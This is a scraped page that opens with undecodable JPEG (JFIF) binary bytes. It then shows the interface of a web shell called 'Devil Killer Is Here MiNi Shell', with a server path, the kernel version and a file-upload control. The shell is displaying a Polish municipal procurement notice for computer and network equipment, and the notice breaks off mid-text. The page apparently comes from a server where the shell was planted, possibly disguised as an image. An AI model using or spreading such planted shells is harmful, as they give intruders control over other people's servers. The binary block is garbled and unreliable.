JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221202/0047264501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup sprzętu oraz wykonanie infrastruktury sieci lokalnej w Urzędzie Gminy Sobienie-Jeziory w ramach projektu „Cyfrowa Gmina” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Sobienie-Jeziory</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582300</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Garwolińska 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sobienie-Jeziory</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-443</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gminasj@gminasj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sobieniejeziory.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup sprzętu oraz wykonanie infrastruktury sieci lokalnej w Urzędzie Gminy Sobienie-Jeziory w ramach projektu „Cyfrowa Gmina” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4b2acf1a-7220-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00472645</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00049688/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Zakup sprzętu oraz wykonanie infrastruktury sieci lokalnej w Urzędzie Gminy Sobienie-Jeziory w ramach projektu „Cyfrowa Gmina”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Operacyjny Polska Cyfrowa na lata 2014-2020 Oś Priorytetowa V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU działanie 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia dotyczące realizacji projektu grantowego &#34;Cyfrowa Gmina&#34; o numerze POPC.05.01.00-00-0001/21-00 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4b2acf1a-7220-11ed-abdb-a69c1593877c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://ezamowienia.gov.pl<br/>(lub https://epuap.gov.pl/wps/portal<br/>lub jkwiatkowska@gminasj.pl z wyłączeniem składania ofert)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">• Komunikacja w postępowaniu w tym<br/>składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z<br/>uwzględnieniem wyjątków określonych w ustawie P.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki<br/>komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o<br/>świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r. poz. 344).<br/>• Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 P.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie<br/>podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w<br/>szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale 11 ust. 1 SWZ<br/>składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>• W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy<br/>zakupowej https://ezamowienia.gov.pl (składanie oferty)<br/>• Szczegółowa instrukcja dla Wykonawców dotycząca złożenia, zmiany i wycofania oferty znajduje się na stronie internetowej pod<br/>adresem: https://ezamowienia.gov.pl/pl/komponent-edukacyjny/<br/>• Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>• Osobą uprawnioną do porozumiewania się z Wykonawcami jest: Justyna Kwiatkowska, jkwiatkowska@gminasj.pl<br/>Pozostałe wymagania zostały zawarte w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z zapisami art. 13 ROZPORZĄDZENIA PARLAMENTU EUROPEJSKIEGO I<br/>RADY (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepły-wu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>(Dz. U. UE. z 2016 r., L 119, poz. 1) informujemy, że Administra-torem Państwa danych osobowych jest:<br/>Wójt Gminy Sobienie-Jeziory<br/>ul. Garwolińska 16<br/>08-443 Sobienie-Jeziory<br/>pow. Otwocki, woj. Mazowieckie<br/>1. Informujemy że na mocy art. 37 ust. 1 lit. a) RODO Administrator wyznaczył Inspektora Ochrony Danych (IOD) – Pana Krzysztofa<br/>Mikulskiego , który w jego imieniu nadzoruje sferę przetwarzania danych osobowych. Z IOD można kontak-tować się pod adresem<br/>mail: iod-km@tbdsiedlce.pl.<br/>2. Pani/Pana dane osobowe przetwarzane będą w celu prowadzenia przedmiotowe-go postępowania o udzielenie zamówienia<br/>publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformali-zowanych<br/>procedur udzielania zamówień publicznych spoczywających na Zama-wiającym (art. 6 ust. 1 lit. c RODO).<br/>3. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych, dalej „ustawa PZP” , związa-nym z<br/>udziałem w postępowaniu o udzielenie zamówienia publicznego. Konse-kwencją niepodania danych osobowych może być brak<br/>Ogłoszenie nr 2022/BZP 00427755/01 z dnia 2022-11-08<br/>2022-11-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>możliwości udzielenia zamówienie publicznego. W szczególności niepodanie stosownych danych osobo-wych może skutkować<br/>odrzuceniem oferty wykonawcy.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ust. 1 ustawy PZP.<br/>5. Administrator może udostępnić Państwa dane innym podmiotom na podstawie umów powierzenia danych zawartych z<br/>podmiotami świadczących usługi na rzecz Administratora ( np. podmioty świadczące usługi informatyczne, czy usługi w za-kresie<br/>archiwizacji lub niszczenia dokumentacji).<br/>6. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie za-mówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowy-wania obejmuje cały czas<br/>trwania umowy;<br/>7. Przysługuje Pani/Panu, z wyjątkami zastrzeżonymi przepisami prawa, możliwość:<br/>• dostępu do danych osobowych jej/jego dotyczących oraz otrzymania ich ko-pii o którym mowa w art.. 15 RODO *,<br/>• żądania sprostowania lub uzupełnienia danych osobowych na podstawie z art. 16 RODO, przy czym skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgod-nym z ustawą,<br/>• w związku z art. 18 RODO żądania ograniczenia przetwarzania danych oso-bowych przy czym prawo to nie ma zastosowania w<br/>odniesieniu do przecho-wywania, przetwarzania danych w celu zapewnienia korzystania z środków ochrony prawnej lub w celu<br/>ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego**.<br/>8. Nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobo-wych jest art. 6 ust. 1 lit. c RODO.<br/>Pozostałe informacje w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.14.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 158780,49 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa komputerów osobistych AIO z oprogramowaniem zgodnie z załącznikiem nr 1 do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 42276,42 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213000-5 - Komputery osobiste</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1 Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1 Cena (C) – waga kryterium 60 pkt.;<br/>2 Okres udzielonej gwarancji (G) – waga kryterium 40 pkt.<br/>1 Cena (C) – waga 60 pkt.<br/>Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę<br/>w Formularzu oferty.<br/>Zamawiający ofercie o najniższej cenie spośród ofert ocenianych przyzna 60 punktów a każdej następnej zostanie<br/>przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>cena najniższa brutto*<br/>C = ------------------------------------------------ x 60 pkt.<br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>2 Okres gwarancji – waga 40 pkt., gdzie punkty wyliczane są wg następującego dodatkowego okresu gwarancji:<br/>Część 1 (G)<br/>• 12 miesięcy – 0 pkt.<br/>• 24 miesiące – 10 pkt.<br/>• 36 miesięcy – 40 pkt.<br/>Część 2 (G)<br/>• 36 miesięcy – 0 pkt.<br/>• 48 miesięcy – 10 pkt.<br/>• 60 miesięcy – 40 pkt.<br/>Część 3 – gwarancja na sprzęt (G1)<br/>• 36 miesięcy – 0 pkt.<br/>• 48 miesięcy – 10 pkt.<br/>• 60 miesięcy – 25 pkt.<br/>Część 3 gwarancja na sieć teleinformacyjną (G2)<br/>• 10 lat – 0 pkt.<br/>• 15 lat – 15 pkt.<br/>Liczba punktów określona zostanie dla części 1 i 2 na podstawie wzoru: P=C+G<br/>Liczba punktów określona zostanie dla części 3 na podstawie wzoru: P=C+G1+G2<br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów<br/>spośród ofert nie podlegających odrzuceniu.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu<br/>i innych kryteriów oceny ofert, zamawiający zastosuje reguły wynikające z art. 248 P.z.p.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa serwera sieciowego wraz z konfiguracją, dostawa urządzenia NAS, dostawa UPS zgodnie z załącznikiem nr 2 do<br/>SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 54065,04 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">: 1 Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>1 Cena (C) – waga kryterium 60 pkt.;<br/>2 Okres udzielonej gwarancji (G) – waga kryterium 40 pkt.<br/>1 Cena (C) – waga 60 pkt.<br/>Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę<br/>w Formularzu oferty.<br/>Zamawiający ofercie o najniższej cenie spośród ofert ocenianych przyzna 60 punktów a każdej następnej zostanie<br/>przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>cena najniższa brutto*<br/>C = ------------------------------------------------ x 60 pkt.<br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>2 Okres gwarancji – waga 40 pkt., gdzie punkty wyliczane są wg następującego dodatkowego okresu gwarancji:<br/>Część 1 (G)<br/>• 12 miesięcy – 0 pkt.<br/>• 24 miesiące – 10 pkt.<br/>• 36 miesięcy – 40 pkt.<br/>Część 2 (G)<br/>• 36 miesięcy – 0 pkt.<br/>• 48 miesięcy – 10 pkt.<br/>• 60 miesięcy – 40 pkt.<br/>Część 3 – gwarancja na sprzęt (G1)<br/>• 36 miesięcy – 0 pkt.<br/>• 48 miesięcy – 10 pkt.<br/>• 60 miesięcy – 25 pkt.<br/>Część 3 gwarancja na sieć teleinformacyjną (G2)<br/>• 10 lat – 0 pkt.<br/>• 15 lat – 15 pkt.<br/>Liczba punktów określona zostanie dla części 1 i 2 na podstawie wzoru: P=C+G<br/>Liczba punktów określona zostanie dla części 3 na podstawie wzoru: P=C+G1+G2<br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów<br/>spośród ofert nie podlegających odrzuceniu.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu<br/>i innych kryteriów oceny ofert, zamawiający zastosuje reguły wynikające z art. 248 P.z.p.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa urządzeń sieciowych wraz z konfiguracją oraz z modernizacją sieci LAN w urzędzie gminy zgodnie z załącznikiem nr 3 do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 64439,02 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32420000-3 - Urządzenia sieciowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1 Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>1 Cena (C) – waga kryterium 60 pkt.;<br/>2 Okres udzielonej gwarancji (G) – waga kryterium 40 pkt.<br/>1 Cena (C) – waga 60 pkt.<br/>Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę<br/>w Formularzu oferty.<br/>Zamawiający ofercie o najniższej cenie spośród ofert ocenianych przyzna 60 punktów a każdej następnej zostanie<br/>przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>cena najniższa brutto*<br/>C = ------------------------------------------------ x 60 pkt.<br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert 